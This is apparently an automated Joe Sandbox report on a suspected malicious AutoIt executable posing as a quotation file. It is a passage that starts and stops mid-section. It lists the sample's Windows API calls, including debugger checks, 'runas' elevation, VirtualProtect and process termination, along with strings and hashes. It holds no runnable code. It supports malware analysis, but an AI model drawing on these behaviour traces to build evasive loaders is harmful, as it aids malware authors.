e07667 59 API calls 107124->107126 107125->107073 107126->107125 107236 e560c0 107127->107236 107129 e5618c 107129->107073 107130->107060 107131->107073 107132->107078 107133->107067 107134->107040 107135->107073 107136->107048 107137->107075 107138->107075 107139->107075 107140->107058 107141->107062 107142->107058 107144 e09837 84 API calls 107143->107144 107145 e7cb1a 107144->107145 107168 e7cb61 Mailbox 107145->107168 107181 e7d7a5 107145->107181 107147 e7cdb9 107148 e7cf2e 107147->107148 107153 e7cdc7 
107147->107153 107220 e7d8c8 92 API calls Mailbox 107148->107220 107151 e7cf3d 107151->107153 107154 e7cf49 107151->107154 107152 e09837 84 API calls 107169 e7cbb2 Mailbox 107152->107169 107194 e7c96e 107153->107194 107154->107168 107159 e7ce00 107209 e20c08 107159->107209 107162 e7ce33 107165 e092ce 59 API calls 107162->107165 107163 e7ce1a 107215 e69e4a 89 API calls 4 library calls 107163->107215 107167 e7ce3f 107165->107167 107166 e7ce25 GetCurrentProcess TerminateProcess 107166->107162 107170 e09050 59 API calls 107167->107170 107168->107085 107169->107147 107169->107152 107169->107168 107213 e7fbce 59 API calls 2 library calls 107169->107213 107214 e7cfdf 61 API calls 2 library calls 107169->107214 107171 e7ce55 107170->107171 107180 e7ce7c 107171->107180 107216 e08d40 59 API calls Mailbox 107171->107216 107172 e7cfa4 107172->107168 107177 e7cfb8 FreeLibrary 107172->107177 107174 e7ce6b 107217 e7d649 107 API calls _free 107174->107217 107177->107168 107180->107172 107218 e08d40 59 API calls Mailbox 107180->107218 107219 e09d3c 60 API calls Mailbox 107180->107219 107221 e7d649 107 API calls _free 107180->107221 107182 e07e4f 59 API calls 107181->107182 107183 e7d7c0 CharLowerBuffW 107182->107183 107222 e5f167 107183->107222 107187 e07667 59 API calls 107188 e7d7f9 107187->107188 107189 e0784b 59 API calls 107188->107189 107190 e7d810 107189->107190 107191 e07d2c 59 API calls 107190->107191 107192 e7d81c Mailbox 107191->107192 107193 e7d858 Mailbox 107192->107193 107229 e7cfdf 61 API calls 2 library calls 107192->107229 107193->107169 107195 e7c989 107194->107195 107199 e7c9de 107194->107199 107196 e20db6 Mailbox 59 API calls 107195->107196 107197 e7c9ab 107196->107197 107198 e20db6 Mailbox 59 API calls 107197->107198 107197->107199 107198->107197 107200 e7da50 107199->107200 107201 e7dc79 Mailbox 107200->107201 107208 e7da73 _strcat _wcscpy __NMSG_WRITE 107200->107208 107201->107159 107202 e09b3c 59 API calls 107202->107208 107203 e09be6 59 API calls 
107203->107208 107204 e09b98 59 API calls 107204->107208 107205 e09837 84 API calls 107205->107208 107206 e2571c 58 API calls __malloc_crt 107206->107208 107208->107201 107208->107202 107208->107203 107208->107204 107208->107205 107208->107206 107232 e65887 61 API calls 2 library calls 107208->107232 107212 e20c1d 107209->107212 107210 e20cb5 VirtualProtect 107211 e20c83 107210->107211 107211->107162 107211->107163 107212->107210 107212->107211 107213->107169 107214->107169 107215->107166 107216->107174 107217->107180 107218->107180 107219->107180 107220->107151 107221->107180 107223 e5f192 __NMSG_WRITE 107222->107223 107224 e5f1d1 107223->107224 107227 e5f1c7 107223->107227 107228 e5f278 107223->107228 107224->107187 107224->107192 107227->107224 107230 e078c4 61 API calls 107227->107230 107228->107224 107231 e078c4 61 API calls 107228->107231 107229->107193 107230->107227 107231->107228 107232->107208 107233->107097 107234->107097 107235->107098 107237 e560e8 107236->107237 107238 e560cb 107236->107238 107237->107129 107238->107237 107240 e560ab 59 API calls Mailbox 107238->107240 107240->107238

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E03B7A
                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                        • Part of subcall function 00E1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F
                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EB7770,00000010), ref: 00E3D281
                                                                      • SetCurrentDirectoryW.KERNEL32(?,00EC52F8,?,?,?), ref: 00E3D2B9
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB4260,00EC52F8,?,?,?), ref: 00E3D33F
                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E3D346
                                                                        • Part of subcall function 00E03A46: GetSysColorBrush.USER32(0000000F), ref: 00E03A50
                                                                        • Part of subcall function 00E03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(00000063), ref: 00E03A76
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(000000A4), ref: 00E03A88
                                                                        • Part of subcall function 00E03A46: LoadIconW.USER32(000000A2), ref: 00E03A9A
                                                                        • Part of subcall function 00E03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
                                                                        • Part of subcall function 00E03A46: RegisterClassExW.USER32(?), ref: 00E03B16
                                                                        • Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
                                                                        • Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
                                                                        • Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A38
                                                                        • Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A41
                                                                        • Part of subcall function 00E0434A: _memset.LIBCMT ref: 00E04370
                                                                        • Part of subcall function 00E0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%
                                                                      • API String ID: 529118366-3343222573
                                                                      • Opcode ID: ab9bca16b7f7a9124ecc58a84b4fc86a989f8c12de5208548056a4ba6006285f
                                                                      • Instruction ID: 9fda29f55d59d5a8b82ce0e6c99499a0894d2a763eaaca82c67fb3878b361560
                                                                      • Opcode Fuzzy Hash: ab9bca16b7f7a9124ecc58a84b4fc86a989f8c12de5208548056a4ba6006285f
                                                                      • Instruction Fuzzy Hash: 2A510A71D08208AEDB05EBB5DC45EEEBBF8AB45704F106069F451B21F1CA7166CACB20

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00E049CD
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • GetCurrentProcess.KERNEL32(?,00E8FAEC,00000000,00000000,?), ref: 00E04A9A
                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00E04AA1
                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E04AE7
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E04AF2
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E04B23
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E04B2F
                                                                      Similarity
                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                      • String ID:
                                                                      • API String ID: 1986165174-0
                                                                      • Opcode ID: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
                                                                      • Instruction ID: 5b000cb40289bb3c9cbb993d025fafe3ff17d309928bec463a3aee695790250f
                                                                      • Opcode Fuzzy Hash: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
                                                                      • Instruction Fuzzy Hash: 859127B198D7C0DECB31CB7895541AAFFF4AF29300F44599ED1CBA3A81D220B948C719

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04E99
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04EB0
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D937
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D94C
                                                                      • LockResource.KERNEL32(00E04D8E,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F,00000000), ref: 00E3D95F
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
                                                                      • Instruction ID: c32002b434ba44d1dcd274f2dfb435c10d939bd8c6624687f188e18c71cd5303
                                                                      • Opcode Fuzzy Hash: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
                                                                      • Instruction Fuzzy Hash: 0A1151B5240700BFD7258B65ED48F677BB9FBC5711F104268F509EA1A0DB61E8458660
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: pb$%
                                                                      • API String ID: 3964851224-1798441486
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                                                                      • API String ID: 0-2781164977
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00E3E398), ref: 00E6446A
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00E6447B
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6448B
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10A5B
                                                                      • timeGetTime.WINMM ref: 00E10D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E10E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00E10EFA
                                                                      • DestroyWindow.USER32 ref: 00E10F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E10F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00E44E83
                                                                      • TranslateMessage.USER32(?), ref: 00E45C60
                                                                      • DispatchMessageW.USER32(?), ref: 00E45C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E45C82
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                                                                      • API String ID: 4212290369-1420604165

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E68F5F: __time64.LIBCMT ref: 00E68F69
                                                                        • Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD
                                                                      • __wsplitpath.LIBCMT ref: 00E69234
                                                                        • Part of subcall function 00E240FB: __wsplitpath_helper.LIBCMT ref: 00E2413B
                                                                      • _wcscpy.LIBCMT ref: 00E69247
                                                                      • _wcscat.LIBCMT ref: 00E6925A
                                                                      • __wsplitpath.LIBCMT ref: 00E6927F
                                                                      • _wcscat.LIBCMT ref: 00E69295
                                                                      • _wcscat.LIBCMT ref: 00E692A8
                                                                        • Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FDE
                                                                        • Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FED
                                                                      • _wcscmp.LIBCMT ref: 00E691EF
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69452
                                                                      • _wcsncpy.LIBCMT ref: 00E694C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 00E694FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E69511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69534
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC52F8,?,00E037AE,?), ref: 00E04724
                                                                        • Part of subcall function 00E2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E07165), ref: 00E2052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E071A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3E8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E3E909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E3E947
                                                                      • _wcscat.LIBCMT ref: 00E3E9A0
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at e03633 (legend: Executed / Not Executed); basic blocks e03633 through e3d16e, with calls to DefWindowProcW, PostQuitMessage, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow and SetFocus]
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00E036D2
                                                                      • KillTimer.USER32(?,00000001), ref: 00E036FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0372A
                                                                      • CreatePopupMenu.USER32 ref: 00E0373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 00E0374D
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated$%
                                                                      • API String ID: 129472671-3835587964

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00E03A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00E03A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00E03A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00E03B16
                                                                        • Part of subcall function 00E03041: GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                        • Part of subcall function 00E03041: RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                        • Part of subcall function 00E03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                        • Part of subcall function 00E03041: InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                        • Part of subcall function 00E03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                        • Part of subcall function 00E03041: LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                        • Part of subcall function 00E03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
                                                                      • Instruction ID: 69aebdeae87edde557c1db1b2043f16f242cb6d26c60082a7e74f32312b37622
                                                                      • Opcode Fuzzy Hash: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
                                                                      • Instruction Fuzzy Hash: 4121F572910308AFEB14DFA6EC49B9D7BF4EB08711F10012AF504B62B1D7B666998F94

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                                                                      • API String ID: 1825951767-347772802
                                                                      • Opcode ID: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
                                                                      • Instruction ID: 192eb85c1968730264a4b75eabd22cc378f78f6e27086fff5053705a8a75955f
                                                                      • Opcode Fuzzy Hash: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
                                                                      • Instruction Fuzzy Hash: D6A16C7291022D9ACB05EBA0DC95EEEB7B8FF54300F442529F416B71D2DF746A89CB60

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
                                                                        • Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1
                                                                        • Part of subcall function 00E160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E0F930), ref: 00E16154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0F9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 00E0FA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E445C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <W$\T$%$S
                                                                      • API String ID: 1986988660-191198415
                                                                      • Opcode ID: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
                                                                      • Instruction ID: a66109b996b1257448f377e2d8c33e3ce25e792e097450120c235c9dafb826fe
                                                                      • Opcode Fuzzy Hash: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
                                                                      • Instruction Fuzzy Hash: 6681CFB2905B40CFC388DF2AA941E597BE5FB98306750913ED02AF7261E77264CB8F11

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0104FF39
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0105015F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction ID: fb20e079f5b25002e08465d432d559f9c1463a92d13cd69c7eba354080d9d421
                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction Fuzzy Hash: 9AA13770E00209EBDB54CFA8C898BEEBBB5FF48304F208599E641BB285D7759A41CF54

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00E03A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00E03A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                                                                      • Instruction ID: 0479a126abba4d8ffe7be4fd4c6a95d4f69d7c190c43a64db7690fc4e963f133
                                                                      • Opcode Fuzzy Hash: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                                                                      • Instruction Fuzzy Hash: 01F0DA725416907EEB355727AC49E6B2EBDD7C6F50B00413EF908B2170C6762896DAB0

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0104FB38: Sleep.KERNELBASE(000001F4), ref: 0104FB49
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0104FD54
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: OIJPJG66ACFQR
                                                                      • API String ID: 2694422964-2049201534
                                                                      • Opcode ID: 263edb70b1a25ecfc0afb5e7cb0a04efc0b0d527631c1f593d3a8f351db73a97
                                                                      • Instruction ID: 5568fbff7bd5eaf15aa1ec2f5b4db3924e26fcbba35045a9a81274afc15179cd
                                                                      • Opcode Fuzzy Hash: 263edb70b1a25ecfc0afb5e7cb0a04efc0b0d527631c1f593d3a8f351db73a97
                                                                      • Instruction Fuzzy Hash: C751A471D0424ADBEF15DBE8C854BEEBB79AF14300F0041A9E648BB2C1D7B91B45CBA5

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E3D3D7
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _memset.LIBCMT ref: 00E040FC
                                                                      • _wcscpy.LIBCMT ref: 00E04150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160
                                                                      Strings
                                                                      Memory Dump Source
